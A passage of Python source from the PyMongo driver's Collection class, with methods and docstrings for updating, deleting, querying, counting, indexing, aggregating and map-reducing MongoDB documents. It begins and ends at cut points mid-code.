bypass_doc_val=False): """Internal update / replace helper.""" common.validate_boolean("upsert", upsert) if manipulate: document = self.__database._fix_incoming(document, self) concern = (write_concern or self.write_concern).document acknowledged = concern.get("w") != 0 command = SON([('update', self.name), ('ordered', ordered), ('updates', [SON([('q', criteria), ('u', document), ('multi', multi), ('upsert', upsert)])])]) if concern: command['writeConcern'] = concern if sock_info.max_wire_version > 1 and acknowledged: # Update command. if bypass_doc_val and sock_info.max_wire_version >= 4: command['bypassDocumentValidation'] = True # The command result has to be published for APM unmodified # so we make a shallow copy here before adding updatedExisting. result = sock_info.command( self.__database.name, command, codec_options=self.__write_response_codec_options).copy() _check_write_command_response([(0, result)]) # Add the updatedExisting field for compatibility. if result.get('n') and 'upserted' not in result: result['updatedExisting'] = True else: result['updatedExisting'] = False # MongoDB >= 2.6.0 returns the upsert _id in an array # element. Break it out for backward compatibility. if 'upserted' in result: result['upserted'] = result['upserted'][0]['_id'] return result else: # Legacy OP_UPDATE. return self._legacy_write( sock_info, 'update', command, acknowledged, op_id, bypass_doc_val, message.update, self.__full_name, upsert, multi, criteria, document, acknowledged, concern, check_keys, self.__write_response_codec_options) def replace_one(self, filter, replacement, upsert=False, bypass_document_validation=False): """Replace a single document matching the filter. >>> for doc in db.test.find({}): ... print(doc) ... {u'x': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')} >>> result = db.test.replace_one({'x': 1}, {'y': 1}) >>> result.matched_count 1 >>> result.modified_count 1 >>> for doc in db.test.find({}): ... print(doc) ... {u'y': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')} The *upsert* option can be used to insert a new document if a matching document does not exist. >>> result = db.test.replace_one({'x': 1}, {'x': 1}, True) >>> result.matched_count 0 >>> result.modified_count 0 >>> result.upserted_id ObjectId('54f11e5c8891e756a6e1abd4') >>> db.test.find_one({'x': 1}) {u'x': 1, u'_id': ObjectId('54f11e5c8891e756a6e1abd4')} :Parameters: - `filter`: A query that matches the document to replace. - `replacement`: The new document. - `upsert` (optional): If ``True``, perform an insert if no documents match the filter. - `bypass_document_validation`: (optional) If ``True``, allows the write to opt-out of document level validation. Default is ``False``. :Returns: - An instance of :class:`~pymongo.results.UpdateResult`. .. note:: `bypass_document_validation` requires server version **>= 3.2** .. versionchanged:: 3.2 Added bypass_document_validation support .. versionadded:: 3.0 """ common.validate_is_mapping("filter", filter) common.validate_ok_for_replace(replacement) with self._socket_for_writes() as sock_info: result = self._update(sock_info, filter, replacement, upsert, bypass_doc_val=bypass_document_validation) return UpdateResult(result, self.write_concern.acknowledged) def update_one(self, filter, update, upsert=False, bypass_document_validation=False): """Update a single document matching the filter. >>> for doc in db.test.find(): ... print(doc) ... {u'x': 1, u'_id': 0} {u'x': 1, u'_id': 1} {u'x': 1, u'_id': 2} >>> result = db.test.update_one({'x': 1}, {'$inc': {'x': 3}}) >>> result.matched_count 1 >>> result.modified_count 1 >>> for doc in db.test.find(): ... print(doc) ... {u'x': 4, u'_id': 0} {u'x': 1, u'_id': 1} {u'x': 1, u'_id': 2} :Parameters: - `filter`: A query that matches the document to update. - `update`: The modifications to apply. - `upsert` (optional): If ``True``, perform an insert if no documents match the filter. - `bypass_document_validation`: (optional) If ``True``, allows the write to opt-out of document level validation. Default is ``False``. :Returns: - An instance of :class:`~pymongo.results.UpdateResult`. .. note:: `bypass_document_validation` requires server version **>= 3.2** .. versionchanged:: 3.2 Added bypass_document_validation support .. versionadded:: 3.0 """ common.validate_is_mapping("filter", filter) common.validate_ok_for_update(update) with self._socket_for_writes() as sock_info: result = self._update(sock_info, filter, update, upsert, check_keys=False, bypass_doc_val=bypass_document_validation) return UpdateResult(result, self.write_concern.acknowledged) def update_many(self, filter, update, upsert=False, bypass_document_validation=False): """Update one or more documents that match the filter. >>> for doc in db.test.find(): ... print(doc) ... {u'x': 1, u'_id': 0} {u'x': 1, u'_id': 1} {u'x': 1, u'_id': 2} >>> result = db.test.update_many({'x': 1}, {'$inc': {'x': 3}}) >>> result.matched_count 3 >>> result.modified_count 3 >>> for doc in db.test.find(): ... print(doc) ... {u'x': 4, u'_id': 0} {u'x': 4, u'_id': 1} {u'x': 4, u'_id': 2} :Parameters: - `filter`: A query that matches the documents to update. - `update`: The modifications to apply. - `upsert` (optional): If ``True``, perform an insert if no documents match the filter. - `bypass_document_validation`: (optional) If ``True``, allows the write to opt-out of document level validation. Default is ``False``. :Returns: - An instance of :class:`~pymongo.results.UpdateResult`. .. note:: `bypass_document_validation` requires server version **>= 3.2** .. versionchanged:: 3.2 Added bypass_document_validation support .. versionadded:: 3.0 """ common.validate_is_mapping("filter", filter) common.validate_ok_for_update(update) with self._socket_for_writes() as sock_info: result = self._update(sock_info, filter, update, upsert, check_keys=False, multi=True, bypass_doc_val=bypass_document_validation) return UpdateResult(result, self.write_concern.acknowledged) def drop(self): """Alias for :meth:`~pymongo.database.Database.drop_collection`. The following two calls are equivalent: >>> db.foo.drop() >>> db.drop_collection("foo") """ self.__database.drop_collection(self.__name) def _delete( self, sock_info, criteria, multi, write_concern=None, op_id=None, ordered=True): """Internal delete helper.""" common.validate_is_mapping("filter", criteria) concern = (write_concern or self.write_concern).document acknowledged = concern.get("w") != 0 command = SON([('delete', self.name), ('ordered', ordered), ('deletes', [SON([('q', criteria), ('limit', int(not multi))])])]) if concern: command['writeConcern'] = concern if sock_info.max_wire_version > 1 and acknowledged: # Delete command. result = sock_info.command( self.__database.name, command, codec_options=self.__write_response_codec_options) _check_write_command_response([(0, result)]) return result else: # Legacy OP_DELETE. return self._legacy_write( sock_info, 'delete', command, acknowledged, op_id, False, message.delete, self.__full_name, criteria, acknowledged, concern, self.__write_response_codec_options, int(not multi)) def delete_one(self, filter): """Delete a single document matching the filter. >>> db.test.count({'x': 1}) 3 >>> result = db.test.delete_one({'x': 1}) >>> result.deleted_count 1 >>> db.test.count({'x': 1}) 2 :Parameters: - `filter`: A query that matches the document to delete. :Returns: - An instance of :class:`~pymongo.results.DeleteResult`. .. versionadded:: 3.0 """ with self._socket_for_writes() as sock_info: return DeleteResult(self._delete(sock_info, filter, False), self.write_concern.acknowledged) def delete_many(self, filter): """Delete one or more documents matching the filter. >>> db.test.count({'x': 1}) 3 >>> result = db.test.delete_many({'x': 1}) >>> result.deleted_count 3 >>> db.test.count({'x': 1}) 0 :Parameters: - `filter`: A query that matches the documents to delete. :Returns: - An instance of :class:`~pymongo.results.DeleteResult`. .. versionadded:: 3.0 """ with self._socket_for_writes() as sock_info: return DeleteResult(self._delete(sock_info, filter, True), self.write_concern.acknowledged) def find_one(self, filter=None, *args, **kwargs): """Get a single document from the database. All arguments to :meth:`find` are also valid arguments for :meth:`find_one`, although any `limit` argument will be ignored. Returns a single document, or ``None`` if no matching document is found. The :meth:`find_one` method obeys the :attr:`read_preference` of this :class:`Collection`. :Parameters: - `filter` (optional): a dictionary specifying the query to be performed OR any other type to be used as the value for a query for ``"_id"``. - `*args` (optional): any additional positional arguments are the same as the arguments to :meth:`find`. - `**kwargs` (optional): any additional keyword arguments are the same as the arguments to :meth:`find`. - `max_time_ms` (optional): a value for max_time_ms may be specified as part of `**kwargs`, e.g. >>> find_one(max_time_ms=100) """ if (filter is not None and not isinstance(filter, collections.Mapping)): filter = {"_id": filter} max_time_ms = kwargs.pop("max_time_ms", None) cursor = self.find(filter, *args, **kwargs).max_time_ms(max_time_ms) for result in cursor.limit(-1): return result return None def find(self, *args, **kwargs): """Query the database. The `filter` argument is a prototype document that all results must match. For example: >>> db.test.find({"hello": "world"}) only matches documents that have a key "hello" with value "world". Matches can have other keys *in addition* to "hello". The `projection` argument is used to specify a subset of fields that should be included in the result documents. By limiting results to a certain subset of fields you can cut down on network traffic and decoding time. Raises :class:`TypeError` if any of the arguments are of improper type. Returns an instance of :class:`~pymongo.cursor.Cursor` corresponding to this query. The :meth:`find` method obeys the :attr:`read_preference` of this :class:`Collection`. :Parameters: - `filter` (optional): a SON object specifying elements which must be present for a document to be included in the result set - `projection` (optional): a list of field names that should be returned in the result set or a dict specifying the fields to include or exclude. If `projection` is a list "_id" will always be returned. Use a dict to exclude fields from the result (e.g. projection={'_id': False}). - `skip` (optional): the number of documents to omit (from the start of the result set) when returning the results - `limit` (optional): the maximum number of results to return - `no_cursor_timeout` (optional): if False (the default), any returned cursor is closed by the server after 10 minutes of inactivity. If set to True, the returned cursor will never time out on the server. Care should be taken to ensure that cursors with no_cursor_timeout turned on are properly closed. - `cursor_type` (optional): the type of cursor to return. The valid options are defined by :class:`~pymongo.cursor.CursorType`: - :attr:`~pymongo.cursor.CursorType.NON_TAILABLE` - the result of this find call will return a standard cursor over the result set. - :attr:`~pymongo.cursor.CursorType.TAILABLE` - the result of this find call will be a tailable cursor - tailable cursors are only for use with capped collections. They are not closed when the last data is retrieved but are kept open and the cursor location marks the final document position. If more data is received iteration of the cursor will continue from the last document received. For details, see the `tailable cursor documentation <http://www.mongodb.org/display/DOCS/Tailable+Cursors>`_. - :attr:`~pymongo.cursor.CursorType.TAILABLE_AWAIT` - the result of this find call will be a tailable cursor with the await flag set. The server will wait for a few seconds after returning the full result set so that it can capture and return additional data added during the query. - :attr:`~pymongo.cursor.CursorType.EXHAUST` - the result of this find call will be an exhaust cursor. MongoDB will stream batched results to the client without waiting for the client to request each batch, reducing latency. See notes on compatibility below. - `sort` (optional): a list of (key, direction) pairs specifying the sort order for this query. See :meth:`~pymongo.cursor.Cursor.sort` for details. - `allow_partial_results` (optional): if True, mongos will return partial results if some shards are down instead of returning an error. - `oplog_replay` (optional): If True, set the oplogReplay query flag. - `modifiers` (optional): A dict specifying the MongoDB `query modifiers`_ that should be used for this query. For example:: >>> db.test.find(modifiers={"$maxTimeMS": 500}) - `batch_size` (optional): Limits the number of documents returned in a single batch. - `manipulate` (optional): **DEPRECATED** - If True (the default), apply any outgoing SON manipulators before returning. .. note:: There are a number of caveats to using :attr:`~pymongo.cursor.CursorType.EXHAUST` as cursor_type: - The `limit` option can not be used with an exhaust cursor. - Exhaust cursors are not supported by mongos and can not be used with a sharded cluster. - A :class:`~pymongo.cursor.Cursor` instance created with the :attr:`~pymongo.cursor.CursorType.EXHAUST` cursor_type requires an exclusive :class:`~socket.socket` connection to MongoDB. If the :class:`~pymongo.cursor.Cursor` is discarded without being completely iterated the underlying :class:`~socket.socket` connection will be closed and discarded without being returned to the connection pool. .. versionchanged:: 3.0 Changed the parameter names `spec`, `fields`, `timeout`, and `partial` to `filter`, `projection`, `no_cursor_timeout`, and `allow_partial_results` respectively. Added the `cursor_type`, `oplog_replay`, and `modifiers` options. Removed the `network_timeout`, `read_preference`, `tag_sets`, `secondary_acceptable_latency_ms`, `max_scan`, `snapshot`, `tailable`, `await_data`, `exhaust`, `as_class`, and slave_okay parameters. Removed `compile_re` option: PyMongo now always represents BSON regular expressions as :class:`~bson.regex.Regex` objects. Use :meth:`~bson.regex.Regex.try_compile` to attempt to convert from a BSON regular expression to a Python regular expression object. Soft deprecated the `manipulate` option. .. versionchanged:: 2.7 Added `compile_re` option. If set to False, PyMongo represented BSON regular expressions as :class:`~bson.regex.Regex` objects instead of attempting to compile BSON regular expressions as Python native regular expressions, thus preventing errors for some incompatible patterns, see `PYTHON-500`_. .. versionadded:: 2.3 The `tag_sets` and `secondary_acceptable_latency_ms` parameters. .. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500 .. _query modifiers: http://docs.mongodb.org/manual/reference/operator/query-modifier/ .. mongodoc:: find """ return Cursor(self, *args, **kwargs) def parallel_scan(self, num_cursors): """Scan this entire collection in parallel. Returns a list of up to ``num_cursors`` cursors that can be iterated concurrently. As long as the collection is not modified during scanning, each document appears once in one of the cursors result sets. For example, to process each document in a collection using some thread-safe ``process_document()`` function: >>> def process_cursor(cursor): ... for document in cursor: ... # Some thread-safe processing function: ... process_document(document) >>> >>> # Get up to 4 cursors. ... >>> cursors = collection.parallel_scan(4) >>> threads = [ ... threading.Thread(target=process_cursor, args=(cursor,)) ... for cursor in cursors] >>> >>> for thread in threads: ... thread.start() >>> >>> for thread in threads: ... thread.join() >>> >>> # All documents have now been processed. The :meth:`parallel_scan` method obeys the :attr:`read_preference` of this :class:`Collection`. :Parameters: - `num_cursors`: the number of cursors to return .. note:: Requires server version **>= 2.5.5**. .. versionchanged:: 3.0 Removed support for arbitrary keyword arguments, since the parallelCollectionScan command has no optional arguments. """ cmd = SON([('parallelCollectionScan', self.__name), ('numCursors', num_cursors)]) with self._socket_for_reads() as (sock_info, slave_ok): result = self._command(sock_info, cmd, slave_ok, read_concern=self.read_concern) return [CommandCursor(self, cursor['cursor'], sock_info.address) for cursor in result['cursors']] def _count(self, cmd): """Internal count helper.""" with self._socket_for_reads() as (sock_info, slave_ok): res = self._command( sock_info, cmd, slave_ok, allowable_errors=["ns missing"], codec_options=self.__write_response_codec_options, read_concern=self.read_concern) if res.get("errmsg", "") == "ns missing": return 0 return int(res["n"]) def count(self, filter=None, **kwargs): """Get the number of documents in this collection. All optional count parameters should be passed as keyword arguments to this method. Valid options include: - `hint` (string or list of tuples): The index to use. Specify either the index name as a string or the index specification as a list of tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]). - `limit` (int): The maximum number of documents to count. - `skip` (int): The number of matching documents to skip before returning results. - `maxTimeMS` (int): The maximum amount of time to allow the count command to run, in milliseconds. The :meth:`count` method obeys the :attr:`read_preference` of this :class:`Collection`. :Parameters: - `filter` (optional): A query document that selects which documents to count in the collection. - `**kwargs` (optional): See list of options above. """ cmd = SON([("count", self.__name)]) if filter is not None: if "query" in kwargs: raise ConfigurationError("can't pass both filter and query") kwargs["query"] = filter if "hint" in kwargs and not isinstance(kwargs["hint"], string_type): kwargs["hint"] = helpers._index_document(kwargs["hint"]) cmd.update(kwargs) return self._count(cmd) def create_indexes(self, indexes): """Create one or more indexes on this collection. >>> from pymongo import IndexModel, ASCENDING, DESCENDING >>> index1 = IndexModel([("hello", DESCENDING), ... ("world", ASCENDING)], name="hello_world") >>> index2 = IndexModel([("goodbye", DESCENDING)]) >>> db.test.create_indexes([index1, index2]) ["hello_world"] :Parameters: - `indexes`: A list of :class:`~pymongo.operations.IndexModel` instances. .. note:: `create_indexes` uses the ``createIndexes`` command introduced in MongoDB **2.6** and cannot be used with earlier versions. .. versionadded:: 3.0 """ if not isinstance(indexes, list): raise TypeError("indexes must be a list") names = [] def gen_indexes(): for index in indexes: if not isinstance(index, IndexModel): raise TypeError("%r is not an instance of " "pymongo.operations.IndexModel" % (index,)) document = index.document names.append(document["name"]) yield document cmd = SON([('createIndexes', self.name), ('indexes', list(gen_indexes()))]) with self._socket_for_writes() as sock_info: self._command( sock_info, cmd, read_preference=ReadPreference.PRIMARY) return names def __create_index(self, keys, index_options): """Internal create index helper. :Parameters: - `keys`: a list of tuples [(key, type), (key, type), ...] - `index_options`: a dict of index options. """ index_doc = helpers._index_document(keys) index = {"key": index_doc} index.update(index_options) with self._socket_for_writes() as sock_info: cmd = SON([('createIndexes', self.name), ('indexes', [index])]) try: self._command( sock_info, cmd, read_preference=ReadPreference.PRIMARY) except OperationFailure as exc: if exc.code in common.COMMAND_NOT_FOUND_CODES: index["ns"] = self.__full_name wcn = (self.write_concern if self.write_concern.acknowledged else WriteConcern()) self.__database.system.indexes._insert( sock_info, index, True, False, False, wcn) else: raise def create_index(self, keys, **kwargs): """Creates an index on this collection. Takes either a single key or a list of (key, direction) pairs. The key(s) must be an instance of :class:`basestring` (:class:`str` in python 3), and the direction(s) must be one of (:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`, :data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`, :data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`, :data:`~pymongo.TEXT`). To create a single key ascending index on the key ``'mike'`` we just use a string argument:: >>> my_collection.create_index("mike") For a compound index on ``'mike'`` descending and ``'eliot'`` ascending we need to use a list of tuples:: >>> my_collection.create_index([("mike", pymongo.DESCENDING), ... ("eliot", pymongo.ASCENDING)]) All optional index creation parameters should be passed as keyword arguments to this method. For example:: >>> my_collection.create_index([("mike", pymongo.DESCENDING)], ... background=True) Valid options include, but are not limited to: - `name`: custom name to use for this index - if none is given, a name will be generated. - `unique`: if ``True`` creates a uniqueness constraint on the index. - `background`: if ``True`` this index should be created in the background. - `sparse`: if ``True``, omit from the index any documents that lack the indexed field. - `bucketSize`: for use with geoHaystack indexes. Number of documents to group together within a certain proximity to a given longitude and latitude. - `min`: minimum value for keys in a :data:`~pymongo.GEO2D` index. - `max`: maximum value for keys in a :data:`~pymongo.GEO2D` index. - `expireAfterSeconds`: <int> Used to create an expiring (TTL) collection. MongoDB will automatically delete documents from this collection after <int> seconds. The indexed field must be a UTC datetime or the data will not expire. - `partialFilterExpression`: A document that specifies a filter for a partial index. See the MongoDB documentation for a full list of supported options by server version. .. warning:: `dropDups` is not supported by MongoDB 3.0 or newer. The option is silently ignored by the server and unique index builds using the option will fail if a duplicate value is detected. .. note:: `partialFilterExpression` requires server version **>= 3.2** :Parameters: - `keys`: a single key or a list of (key, direction) pairs specifying the index to create - `**kwargs` (optional): any additional index creation options (see the above list) should be passed as keyword arguments .. versionchanged:: 3.2 Added partialFilterExpression to support partial indexes. .. versionchanged:: 3.0 Renamed `key_or_list` to `keys`. Removed the `cache_for` option. :meth:`create_index` no longer caches index names. Removed support for the drop_dups and bucket_size aliases. .. mongodoc:: indexes """ keys = helpers._index_list(keys) name = kwargs.setdefault("name", helpers._gen_index_name(keys)) self.__create_index(keys, kwargs) return name def ensure_index(self, key_or_list, cache_for=300, **kwargs): """**DEPRECATED** - Ensures that an index exists on this collection. .. versionchanged:: 3.0 **DEPRECATED** """ warnings.warn("ensure_index is deprecated. Use create_index instead.", DeprecationWarning, stacklevel=2) # The types supported by datetime.timedelta. if not (isinstance(cache_for, integer_types) or isinstance(cache_for, float)): raise TypeError("cache_for must be an integer or float.") if "drop_dups" in kwargs: kwargs["dropDups"] = kwargs.pop("drop_dups") if "bucket_size" in kwargs: kwargs["bucketSize"] = kwargs.pop("bucket_size") keys = helpers._index_list(key_or_list) name = kwargs.setdefault("name", helpers._gen_index_name(keys)) # Note that there is a race condition here. One thread could # check if the index is cached and be preempted before creating # and caching the index. This means multiple threads attempting # to create the same index concurrently could send the index # to the server two or more times. This has no practical impact # other than wasted round trips. if not self.__database.client._cached(self.__database.name, self.__name, name): self.__create_index(keys, kwargs) self.__database.client._cache_index(self.__database.name, self.__name, name, cache_for) return name return None def drop_indexes(self): """Drops all indexes on this collection. Can be used on non-existant collections or collections with no indexes. Raises OperationFailure on an error. """ self.__database.client._purge_index(self.__database.name, self.__name) self.drop_index("*") def drop_index(self, index_or_name): """Drops the specified index on this collection. Can be used on non-existant collections or collections with no indexes. Raises OperationFailure on an error (e.g. trying to drop an index that does not exist). `index_or_name` can be either an index name (as returned by `create_index`), or an index specifier (as passed to `create_index`). An index specifier should be a list of (key, direction) pairs. Raises TypeError if index is not an instance of (str, unicode, list). .. warning:: if a custom name was used on index creation (by passing the `name` parameter to :meth:`create_index` or :meth:`ensure_index`) the index **must** be dropped by name. :Parameters: - `index_or_name`: index (or name of index) to drop """ name = index_or_name if isinstance(index_or_name, list): name = helpers._gen_index_name(index_or_name) if not isinstance(name, string_type): raise TypeError("index_or_name must be an index name or list") self.__database.client._purge_index( self.__database.name, self.__name, name) cmd = SON([("dropIndexes", self.__name), ("index", name)]) with self._socket_for_writes() as sock_info: self._command(sock_info, cmd, read_preference=ReadPreference.PRIMARY, allowable_errors=["ns not found"]) def reindex(self): """Rebuilds all indexes on this collection. .. warning:: reindex blocks all other operations (indexes are built in the foreground) and will be slow for large collections. """ cmd = SON([("reIndex", self.__name)]) with self._socket_for_writes() as sock_info: return self._command( sock_info, cmd, read_preference=ReadPreference.PRIMARY) def list_indexes(self): """Get a cursor over the index documents for this collection. >>> for index in db.test.list_indexes(): ... print(index) ... SON([(u'v', 1), (u'key', SON([(u'_id', 1)])), (u'name', u'_id_'), (u'ns', u'test.test')]) :Returns: An instance of :class:`~pymongo.command_cursor.CommandCursor`. .. versionadded:: 3.0 """ codec_options = CodecOptions(SON) coll = self.with_options(codec_options) with self._socket_for_primary_reads() as (sock_info, slave_ok): cmd = SON([("listIndexes", self.__name), ("cursor", {})]) if sock_info.max_wire_version > 2: cursor = self._command(sock_info, cmd, slave_ok, ReadPreference.PRIMARY, codec_options)["cursor"] return CommandCursor(coll, cursor, sock_info.address) else: namespace = _UJOIN % (self.__database.name, "system.indexes") res = helpers._first_batch( sock_info, self.__database.name, "system.indexes", {"ns": self.__full_name}, 0, slave_ok, codec_options, ReadPreference.PRIMARY, cmd, self.database.client._event_listeners) data = res["data"] cursor = { "id": res["cursor_id"], "firstBatch": data, "ns": namespace, } # Note that a collection can only have 64 indexes, so we don't # technically have to pass len(data) here. There will never be # an OP_GET_MORE call. return CommandCursor( coll, cursor, sock_info.address, len(data)) def index_information(self): """Get information on this collection's indexes. Returns a dictionary where the keys are index names (as returned by create_index()) and the values are dictionaries containing information about each index. The dictionary is guaranteed to contain at least a single key, ``"key"`` which is a list of (key, direction) pairs specifying the index (as passed to create_index()). It will also contain any other metadata about the indexes, except for the ``"ns"`` and ``"name"`` keys, which are cleaned. Example output might look like this: >>> db.test.ensure_index("x", unique=True) u'x_1' >>> db.test.index_information() {u'_id_': {u'key': [(u'_id', 1)]}, u'x_1': {u'unique': True, u'key': [(u'x', 1)]}} """ cursor = self.list_indexes() info = {} for index in cursor: index["key"] = index["key"].items() index = dict(index) info[index.pop("name")] = index return info def options(self): """Get the options set on this collection. Returns a dictionary of options and their values - see :meth:`~pymongo.database.Database.create_collection` for more information on the possible options. Returns an empty dictionary if the collection has not been created yet. """ with self._socket_for_primary_reads() as (sock_info, slave_ok): if sock_info.max_wire_version > 2: criteria = {"name": self.__name} else: criteria = {"name": self.__full_name} cursor = self.__database._list_collections(sock_info, slave_ok, criteria) result = None for doc in cursor: result = doc break if not result: return {} options = result.get("options", {}) if "create" in options: del options["create"] return options def aggregate(self, pipeline, **kwargs): """Perform an aggregation using the aggregation framework on this collection. All optional aggregate parameters should be passed as keyword arguments to this method. Valid options include, but are not limited to: - `allowDiskUse` (bool): Enables writing to temporary files. When set to True, aggregation stages can write data to the _tmp subdirectory of the --dbpath directory. The default is False. - `maxTimeMS` (int): The maximum amount of time to allow the operation to run in milliseconds. - `batchSize` (int): The maximum number of documents to return per batch. Ignored if the connected mongod or mongos does not support returning aggregate results using a cursor, or `useCursor` is ``False``. - `useCursor` (bool): Requests that the `server` provide results using a cursor, if possible. Ignored if the connected mongod or mongos does not support returning aggregate results using a cursor. The default is ``True``. Set this to ``False`` when upgrading a 2.4 or older sharded cluster to 2.6 or newer (see the warning below). The :meth:`aggregate` method obeys the :attr:`read_preference` of this :class:`Collection`. Please note that using the ``$out`` pipeline stage requires a read preference of :attr:`~pymongo.read_preferences.ReadPreference.PRIMARY` (the default). The server will raise an error if the ``$out`` pipeline stage is used with any other read preference. .. warning:: When upgrading a 2.4 or older sharded cluster to 2.6 or newer the `useCursor` option **must** be set to ``False`` until all shards have been upgraded to 2.6 or newer. .. note:: This method does not support the 'explain' option. Please use :meth:`~pymongo.database.Database.command` instead. An example is included in the :ref:`aggregate-examples` documentation. :Parameters: - `pipeline`: a list of aggregation pipeline stages - `**kwargs` (optional): See list of options above. :Returns: A :class:`~pymongo.command_cursor.CommandCursor` over the result set. .. versionchanged:: 3.0 The :meth:`aggregate` method always returns a CommandCursor. The pipeline argument must be a list. .. versionchanged:: 2.7 When the cursor option is used, return :class:`~pymongo.command_cursor.CommandCursor` instead of :class:`~pymongo.cursor.Cursor`. .. versionchanged:: 2.6 Added cursor support. .. versionadded:: 2.3 .. seealso:: :doc:`/examples/aggregation` .. _aggregate command: http://docs.mongodb.org/manual/applications/aggregation """ if not isinstance(pipeline, list): raise TypeError("pipeline must be a list") if "explain" in kwargs: raise ConfigurationError("The explain option is not supported. " "Use Database.command instead.") cmd = SON([("aggregate", self.__name), ("pipeline", pipeline)]) # Remove things that are not command options. batch_size = common.validate_positive_integer_or_none( "batchSize", kwargs.pop("batchSize", None)) use_cursor = common.validate_boolean( "useCursor", kwargs.pop("useCursor", True)) # If the server does not support the "cursor" option we # ignore useCursor and batchSize. with self._socket_for_reads() as (sock_info, slave_ok): if sock_info.max_wire_version > 0: if use_cursor: if "cursor" not in kwargs: kwargs["cursor"] = {} if batch_size is not None: kwargs["cursor"]["batchSize"] = batch_size cmd.update(kwargs) # Apply this Collection's read concern if $out is not in the # pipeline. if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd: if pipeline and '$out' in pipeline[-1]: result = self._command(sock_info, cmd, slave_ok) else: result = self._command(sock_info, cmd, slave_ok, read_concern=self.read_concern) else: result = self._command(sock_info, cmd, slave_ok) if "cursor" in result: cursor = result["cursor"] else: # Pre-MongoDB 2.6. Fake a cursor. cursor = { "id": 0, "firstBatch": result["result"], "ns": self.full_name, } return CommandCursor( self, cursor, sock_info.address).batch_size(batch_size or 0) # key and condition ought to be optional, but deprecation # would be painful as argument order would have to change. def group(self, key, condition, initial, reduce, finalize=None, **kwargs): """Perform a query similar to an SQL *group by* operation. Returns an array of grouped items. The `key` parameter can be: - ``None`` to use the entire document as a key. - A :class:`list` of keys (each a :class:`basestring` (:class:`str` in python 3)) to group by. - A :class:`basestring` (:class:`str` in python 3), or :class:`~bson.code.Code` instance containing a JavaScript function to be applied to each document, returning the key to group by. The :meth:`group` method obeys the :attr:`read_preference` of this :class:`Collection`. :Parameters: - `key`: fields to group by (see above description) - `condition`: specification of rows to be considered (as a :meth:`find` query specification) - `initial`: initial value of the aggregation counter object - `reduce`: aggregation function as a JavaScript string - `finalize`: function to be called on each object in output list. - `**kwargs` (optional): additional arguments to the group command may be passed as keyword arguments to this helper method .. versionchanged:: 2.2 Removed deprecated argument: command """ group = {} if isinstance(key, string_type): group["$keyf"] = Code(key) elif key is not None: group = {"key": helpers._fields_list_to_dict(key, "key")} group["ns"] = self.__name group["$reduce"] = Code(reduce) group["cond"] = condition group["initial"] = initial if finalize is not None: group["finalize"] = Code(finalize) cmd = SON([("group", group)]) cmd.update(kwargs) with self._socket_for_reads() as (sock_info, slave_ok): return self._command(sock_info, cmd, slave_ok)["retval"] def rename(self, new_name, **kwargs): """Rename this collection. If operating in auth mode, client must be authorized as an admin to perform this operation. Raises :class:`TypeError` if `new_name` is not an instance of :class:`basestring` (:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName` if `new_name` is not a valid collection name. :Parameters: - `new_name`: new name for this collection - `**kwargs` (optional): additional arguments to the rename command may be passed as keyword arguments to this helper method (i.e. ``dropTarget=True``) """ if not isinstance(new_name, string_type): raise TypeError("new_name must be an " "instance of %s" % (string_type.__name__,)) if not new_name or ".." in new_name: raise InvalidName("collection names cannot be empty") if new_name[0] == "." or new_name[-1] == ".": raise InvalidName("collecion names must not start or end with '.'") if "$" in new_name and not new_name.startswith("oplog.$main"): raise InvalidName("collection names must not contain '$'") new_name = "%s.%s" % (self.__database.name, new_name) cmd = SON([("renameCollection", self.__full_name), ("to", new_name)]) cmd.update(kwargs) with self._socket_for_writes() as sock_info: sock_info.command('admin', cmd) def distinct(self, key, filter=None, **kwargs): """Get a list of distinct values for `key` among all documents in this collection. Raises :class:`TypeError` if `key` is not an instance of :class:`basestring` (:class:`str` in python 3). All optional distinct parameters should be passed as keyword arguments to this method. Valid options include: - `maxTimeMS` (int): The maximum amount of time to allow the count command to run, in milliseconds. The :meth:`distinct` method obeys the :attr:`read_preference` of this :class:`Collection`. :Parameters: - `key`: name of the field for which we want to get the distinct values - `filter` (optional): A query document that specifies the documents from which to retrieve the distinct values. - `**kwargs` (optional): See list of options above. """ if not isinstance(key, string_type): raise TypeError("key must be an " "instance of %s" % (string_type.__name__,)) cmd = SON([("distinct", self.__name), ("key", key)]) if filter is not None: if "query" in kwargs: raise ConfigurationError("can't pass both filter and query") kwargs["query"] = filter cmd.update(kwargs) with self._socket_for_reads() as (sock_info, slave_ok): return self._command(sock_info, cmd, slave_ok, read_concern=self.read_concern)["values"] def map_reduce(self, map, reduce, out, full_response=False, **kwargs): """Perform a map/reduce operation on this collection. If `full_response` is ``False`` (default) returns a :class:`~pymongo.collection.Collection` instance containing the results of the operation. Otherwise, returns the full response from the server to the `map reduce command`_. :Parameters: - `map`: map function (as a JavaScript string) - `reduce`: reduce function (as a JavaScript string) - `out`: output collection name or `out object` (dict). See the `map reduce command`_ documentation for available options. Note: `out` options are order sensitive. :class:`~bson.son.SON` can be used to specify multiple options. e.g. SON([('replace', <collection name>), ('db', <database name>)]) - `full_response` (optional): if ``True``, return full response to this command - otherwise just return the result collection - `**kwargs` (optional): additional arguments to the `map reduce command`_ may be passed as keyword arguments to this helper method, e.g.:: >>> db.test.map_reduce(map, reduce, "myresults", limit=2) .. note:: The :meth:`map_reduce` method does **not** obey the :attr:`read_preference` of this :class:`Collection`. To run mapReduce on a secondary use the :meth:`inline_map_reduce` method instead. .. seealso:: :doc:`/examples/aggregation` .. versionchanged:: 2.2 Removed deprecated arguments: merge_output and reduce_output .. _map reduce command: http://docs.mongodb.org/manual/reference/command/mapReduce/ .. mongodoc:: mapreduce """ if not isinstance(out, (string_type, collections.Mapping)): raise TypeError("'out' must be an instance of " "%s or a mapping" % (string_type.__name__,)) cmd = SON([("mapreduce", self.__name), ("map", map), ("reduce", reduce), ("out", out)]) cmd.update(kwargs) with self._socket_for_primary_reads() as (sock_info, slave_ok): if (sock_info.max_wire_version >= 4 and 'readConcern' not in cmd and 'inline' in cmd['out']): response = self._command( sock_info, cmd, slave_ok, ReadPreference.PRIMARY, read_concern=self.read_concern) else: response = self._command( sock_info, cmd, 